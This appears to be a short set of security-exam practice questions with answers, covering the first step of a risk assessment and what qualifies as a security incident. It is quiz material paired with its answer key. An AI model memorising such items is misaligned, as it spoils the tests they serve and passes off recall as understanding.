What is the first step of a risk assessment? a. Balance threat impact with countermeasure cost. b. Calculate threat probability and business impact. c. Identify vulnerabilities and threats. d. Identify assets and asset value.

D. Identify assets and asset value.

Which of the following is an example of an incident? a. an invalid user account's login attempt b. account lockout for a single user account c. several invalid password attempts for multiple users d. a user attempting to access a folder to which he does not have access

c. several invalid password attempts for multiple users.